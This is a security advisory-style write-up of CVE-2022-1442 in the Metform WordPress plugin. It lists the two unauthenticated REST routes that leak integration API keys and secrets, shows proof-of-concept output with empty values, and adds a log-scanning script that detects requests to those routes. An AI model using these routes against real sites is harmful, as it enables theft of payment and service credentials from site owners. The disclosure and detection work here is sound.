CVE-2022-1442: WordPress Plugin Metform <= 2.1.3 - Improper Access Control Allowing Unauthenticated Sensitive Information Disclosure
The Metform WordPress plugin is vulnerable to sensitive information disclosure due to improper access control in the ~/core/forms/action.php file which can be exploited by an unauthenticated attacker to view all API keys and secrets of integrated third-party APIs like that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more, in versions up to and including 2.1.3.
Metform is a contact form builder add-on for Elementor, used to build any contact form on the fly with the Metform drag-and-drop builder. It can manage multiple contact forms, and a form can be customized with the Elementor builder. Metform can be integrated with various third-party APIs.
API keys and secrets of third-party integrations can be added and viewed by WordPress admins.
Vulnerability: The Metform WordPress plugin is vulnerable to sensitive information disclosure due to improper access control in the ~/core/forms/action.php file which can be exploited by an unauthenticated attacker to view all API keys and secrets of integrated third-party APIs like that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more, in versions up to and including 2.1.3.
/wp-json/metform/v1/forms/templates/0
/wp-json/metform/v1/forms/get/{form_id_here}
It will list all the juicy stuff.
/wp-content/plugins/metform/core/forms/action.php#L185
Vulnerable Method: get_all_data
    public function get_all_data($post_id) {
        $post = get_post($post_id);
        … …
        return $all_settings;
    }
λ python poc.py
WordPress URL: http://192.168.0.112
Form ID: 123, Form Title: SomeFormTitle
{ "admin_email_attach_submission_copy": "", "admin_email_body": "", "admin_email_from": "", "admin_email_reply_to": "", "admin_email_subject": "", "admin_email_to": "", "aweber_opt": [], "capture_user_browser_data": "", "ckit_opt": [], "count_views": "", "email_verification_confirm_redirect": "", "email_verification_email_subject": "", "email_verification_enable": "", "email_verification_heading": "", "email_verification_paragraph": "", "enable_admin_notification": "", "enable_recaptcha": "", "enable_user_notification": "", "entry_title": "", "failed_cancel_url": "", "form_title": "", "hide_form_after_submission": "", "input_names": "", "limit_total_entries": "", "limit_total_entries_status": "", "mf_active_campaign": "", "mf_active_campaign_api_key": "", "mf_active_campaign_list_id": "", "mf_active_campaign_tag_id": "", "mf_active_campaign_url": "", "mf_automizy": "", "mf_automizy_api_token": "", "mf_automizy_list_id": "", "mf_aweber_dev_api_key": "", "mf_aweber_dev_api_sec": "", "mf_aweber_list_id": "", "mf_ckit_api_key": "", "mf_ckit_list_id": "", "mf_ckit_sec_key": "", "mf_convert_kit": "", "mf_fluent": "", "mf_fluent_webhook": "", "mf_form_to_post": "", "mf_get_reponse_api_key": "", "mf_get_response": "", "mf_get_response_list_id": "", "mf_google_map_api_key": "", "mf_google_sheet": "", "mf_google_sheet_client_id": "", "mf_google_sheet_client_secret": "", "mf_helpscout": "", "mf_helpscout_app_id": "", "mf_helpscout_app_secret": "", "mf_helpscout_conversation_customer_email": "", "mf_helpscout_conversation_customer_first_name": "", "mf_helpscout_conversation_customer_last_name": "", "mf_helpscout_conversation_customer_message": "", "mf_helpscout_conversation_subject": "", "mf_helpscout_mailbox": "", "mf_helpscout_token": "", "mf_hubsopt_token": "", "mf_hubspot": "", "mf_hubspot_form_guid": "", "mf_hubspot_form_portalId": "", "mf_hubspot_forms": "", "mf_login": "", "mf_mail_aweber": "", "mf_mail_chimp": "", "mf_mail_poet": "",
"mf_mail_poet_list_id": "", "mf_mailchimp_api_key": "", "mf_mailchimp_list_id": "", "mf_mailster": "", "mf_mailster_fields": "", "mf_mailster_list_id": "", "mf_payment_currency": "", "mf_paypal": "", "mf_paypal_email": "", "mf_paypal_sandbox": "", "mf_paypal_token": "", "mf_post_submission_author": "", "mf_post_submission_content": "", "mf_post_submission_featured_image": "", "mf_post_submission_post_type": "", "mf_post_submission_title": "", "mf_recaptcha": "", "mf_recaptcha_secret_key": "", "mf_recaptcha_secret_key_v3": "", "mf_recaptcha_site_key": "", "mf_recaptcha_site_key_v3": "", "mf_recaptcha_version": "", "mf_registration": "", "mf_rest_api": "", "mf_rest_api_method": "", "mf_rest_api_url": "", "mf_slack": "", "mf_slack_webhook": "", "mf_sms_admin_body": "", "mf_sms_admin_status": "", "mf_sms_admin_to": "", "mf_sms_from": "", "mf_sms_status": "", "mf_sms_twilio_account_sid": "", "mf_sms_twilio_auth_token": "", "mf_sms_user_body": "", "mf_sms_user_status": "", "mf_stop_vertical_scrolling": "", "mf_stripe": "", "mf_stripe_image_url": "", "mf_stripe_live_publishiable_key": "", "mf_stripe_live_secret_key": "", "mf_stripe_sandbox": "", "mf_stripe_test_publishiable_key": "", "mf_stripe_test_secret_key": "", "mf_thank_you_page": "", "mf_zapier": "", "mf_zapier_webhook": "", "mf_zoho": "", "mf_zoho_token": "", "mp_opt": [], "multiple_submission": "", "redirect_to": "", "require_login": "", "store_entries": "1", "success_message": "", "success_url": "", "user_email_attach_submission_copy": "", "user_email_body": "", "user_email_from": "", "user_email_reply_to": "", "user_email_subject": "" }
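For a site that ran a version up to and including 2.1.3, one way to review web-server access logs for successful requests to the two routes listed above. This is an added example, not part of the original write-up or the plugin: the log lines are constructed, the combined log format is assumed, and the function names are hypothetical. Access logs do not record WordPress authentication state, so the result is a list of clients to review, not proof of disclosure.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# The two routes from the write-up, in the pretty-permalink form (/wp-json/...)
# and in WordPress's query-string form (?rest_route=/...).
ROUTE = re.compile(
    r"(?:/wp-json|[?&]rest_route=)/metform/v1/forms/(templates|get)/(\d+)", re.I)
# Minimal combined-log-format parser: client IP, method, target, status code.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')

# Constructed sample input (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/May/2022:10:01:02 +0000] "GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.7 - - [10/May/2022:10:01:03 +0000] "GET /wp-json/metform/v1/forms/get/123 HTTP/1.1" 200 4096 "-" "-"',
    '203.0.113.7 - - [10/May/2022:10:01:04 +0000] "GET /?rest_route=%2Fmetform%2Fv1%2Fforms%2Fget%2F124 HTTP/1.1" 200 4096 "-" "-"',
    '198.51.100.20 - - [10/May/2022:11:00:00 +0000] "GET /wp-json/metform/v1/forms/get/123 HTTP/1.1" 401 90 "-" "-"',
    '198.51.100.21 - - [10/May/2022:11:05:00 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 900 "-" "-"',
]

def metform_hits(log_lines):
    """Group successful requests to the Metform form routes by client IP."""
    hits = defaultdict(lambda: {"templates": 0, "form_ids": set()})
    for line in log_lines:
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, _method, target, status = m.groups()
        route = ROUTE.search(unquote(target))  # decode %2F before matching
        if not route or status != "200":
            continue  # only a 200 response can have carried form settings
        if route.group(1).lower() == "templates":
            hits[ip]["templates"] += 1
        else:
            hits[ip]["form_ids"].add(int(route.group(2)))
    return dict(hits)

def enumerators(hits, min_forms=2):
    """Clients that listed the forms and then fetched one, or fetched several IDs."""
    return sorted(
        ip for ip, h in hits.items()
        if (h["templates"] and h["form_ids"]) or len(h["form_ids"]) >= min_forms)

if __name__ == "__main__":
    found = metform_hits(SAMPLE_LOG)
    for ip in enumerators(found):
        print(ip, "form IDs fetched:", sorted(found[ip]["form_ids"]))
```

Any form ID that appears in the result identifies a form whose integration keys and secrets should be treated as exposed and rotated with the respective provider.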